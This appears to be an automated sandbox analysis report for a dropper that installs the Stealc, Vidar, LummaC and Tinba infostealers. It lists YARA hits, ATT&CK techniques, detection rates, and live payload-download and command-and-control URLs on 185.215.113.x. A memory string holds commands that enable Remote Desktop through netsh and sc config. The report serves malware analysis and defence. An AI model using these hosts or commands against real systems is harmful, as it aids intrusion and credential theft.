Source: Yara match	File source: 00000017.00000002.3026057510.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: myrdx.exe PID: 4196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 3524, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 14.0.stealc_default2.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.stealc_default2.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.4ad48d7d65.exe.440000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.3052484261.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3142776921.0000000000441000.00000040.00000001.01000000.00000023.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2686160117.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2886105690.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 5864, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4ad48d7d65.exe PID: 1600, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 5864, type: MEMORYSTR

Contains functionality to start a terminal service

Source: 13a34faa3c.exe, 0000001F.00000002.3512155242.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: 13a34faa3c.exe, 0000001F.00000002.3512155242.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	231 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	412 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	41 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	121 Registry Run Keys / Startup Folder	121 Registry Run Keys / Startup Folder	1 Install Root Certificate	NTDS	458 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	13 Software Packing	LSA Secrets	1191 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	671 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	14 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Masquerading	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	671 Virtualization/Sandbox Evasion	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	412 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	55%	ReversingLabs	Win32.Packed.Themida
file.exe	58%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	100%	Avira	TR/AD.Stealc.cucnc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\ProgramData\LgAmARwZ\Application.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\gold[1].exe	100%	Joe Sandbox ML
C:\ProgramData\LgAmARwZ\Application.exe	26%	Virustotal		Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\freebl3.dll	0%	Virustotal		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	Virustotal		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Virustotal		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr	5%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	34%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stealc_default2[1].exe	71%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\myrdx[1].exe	74%	ReversingLabs	Win32.Trojan.LummaC
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\splwow64[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	71%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Temp\1000569001\myrdx.exe	74%	ReversingLabs	Win32.Trojan.LummaC
C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1000857001\d0d468f327.exe	34%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1000876001\4ad48d7d65.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000877001\25e6c25320.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\1000878001\84d15ff2c9.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1000879001\03564c0e08.exe	37%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	55%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\OFF011F112LUQGJPCDB24W.exe	34%	ReversingLabs	Win32.Infostealer.Tinba

Name	Malicious	Antivirus Detection	Reputation
fadehairucw.store	true
founpiuer.store	true
presticitpo.store	true

URLs from Memory and Binaries

Name	Source	Malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/chrome_newtab	d0d468f327.exe, 00000024.00000003.3132758614.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	stealc_default2.exe, 0000000E.00000002.2886105690.0000000000861000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3132758614.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.206/	4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001216000.00000004.00000020.00020000.00000000.sdmp, 4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp, 4ad48d7d65.exe, 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id23ResponseD	MSBuild.exe, 00000017.00000002.3053254646.0000000002B82000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.microsoft	InstallUtil.exe, 00000014.00000002.3014718107.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id12Response	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	stealc_default2.exe, 0000000E.00000002.2910843085.0000000027030000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3223445453.0000000005BFB000.00000004.00000800.00020000.00000000.sdmp	false
https://crisiwarny.store/N	InstallUtil.exe, 00000014.00000002.3014718107.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id2Response	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15V	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/ViewSizePreferences.SourceAumid1	axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id21Response	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.206/ws	4ad48d7d65.exe, 0000002B.00000002.3186818225.0000000001227000.00000004.00000020.00020000.00000000.sdmp	false
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id6ResponseD	MSBuild.exe, 00000017.00000002.3053254646.0000000002AE8000.00000004.00000800.00020000.00000000.sdmp	false
https://crisiwarny.store/Y	InstallUtil.exe, 00000014.00000002.3014718107.0000000000809000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/inc/gold.exeh	axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.phpch	stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.phpVO	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
https://opinieni.store/apip-Y7	d0d468f327.exe, 00000024.00000003.3860117485.0000000001314000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3859535207.0000000001314000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000002.3868990763.0000000001314000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id13ResponseD	MSBuild.exe, 00000017.00000002.3053254646.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.3053254646.0000000002A86000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/15.113.16/ta	axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wsat	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.206;	4ad48d7d65.exe, 0000002B.00000002.3186818225.00000000011CE000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15Response	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.phpFN	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	gold.exe, 00000013.00000002.2774776253.0000000003886000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.3053254646.0000000002A86000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.phpded8	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/inc/gold.exe	axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	false
http://www.autoitscript.com/autoit3/J	splwow64.exe, 0000001C.00000003.2937746757.0000000002921000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000029.00000000.3014711658.0000000000539000.00000002.00000001.01000000.00000022.sdmp, Jurisdiction.pif, 00000029.00000003.3044061111.0000000003C3C000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif.29.dr	false
https://api.ip.sb/ip	myrdx.exe, 00000016.00000002.2910389172.00000000002AC000.00000004.00000001.01000000.00000015.sdmp, MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.3026057510.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false
https://stackoverflow.com/q/14436606/23354	gold.exe, 00000013.00000002.2806606580.0000000004788000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2774776253.0000000003571000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2806606580.0000000004595000.00000004.00000800.00020000.00000000.sdmp, gold.exe, 00000013.00000002.2817662633.0000000005D60000.00000004.10000000.00040000.00000000.sdmp	false
http://tempuri.org/Entity/Id1ResponseD	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	stealc_default2.exe, 0000000E.00000002.2886105690.0000000000861000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3132758614.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false
http://ocsp.rootca1.amazontrust.com0:	d0d468f327.exe, 00000024.00000003.3212968821.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.php&O	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/15.113.16/216e50adc2dd0a1bfe522b3effbbd4e64e3aa636b77##	axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	false
https://ace-snapper-privately.ngrok-free.app/test/testFailed	Offnewhere.exe, 00000015.00000000.2796258598.00000000008F9000.00000002.00000001.01000000.00000014.sdmp, 1.exe, 0000001B.00000000.2881014480.0000000000F04000.00000002.00000001.01000000.0000001B.sdmp	false
https://crisiwarny.store/apiVi	InstallUtil.exe, 00000014.00000002.3035380844.0000000002D30000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id24Response	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	stealc_default2.exe, 0000000E.00000002.2886105690.0000000000861000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3132758614.0000000005B96000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/inc/zxcv.exe	axplong.exe, 00000007.00000002.4561179734.000000000101B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.4561179734.000000000106F000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/lumma/random.exe	axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.17/2fb6c2cc8dce150a.php3	stealc_default2.exe, 0000000E.00000002.2886105690.0000000000832000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id21ResponseD	MSBuild.exe, 00000017.00000002.3053254646.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000017.00000002.3053254646.0000000002A86000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/dobre/splwow64.exe	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/inc/zxcv.exe3	axplong.exe, 00000007.00000002.4561179734.000000000106F000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/Jo89Ku7d/index.phpncodedD	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/08/addressing	MSBuild.exe, 00000017.00000002.3053254646.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	axplong.exe, 00000007.00000002.4561179734.00000000010C6000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/Downloads	axplong.exe, 00000007.00000002.4561179734.000000000108D000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	MSBuild.exe, 00000017.00000002.3053254646.0000000002A49000.00000004.00000800.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	stealc_default2.exe, 0000000E.00000003.2839188523.000000002D131000.00000004.00000020.00020000.00000000.sdmp	false
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	stealc_default2.exe, 0000000E.00000002.2910843085.0000000027030000.00000004.00000020.00020000.00000000.sdmp, d0d468f327.exe, 00000024.00000003.3223445453.0000000005BFB000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	stealc_default2.exe, 0000000E.00000002.2910843085.0000000027030000.00000004.00000020.00020000.00000000.sdmp	false
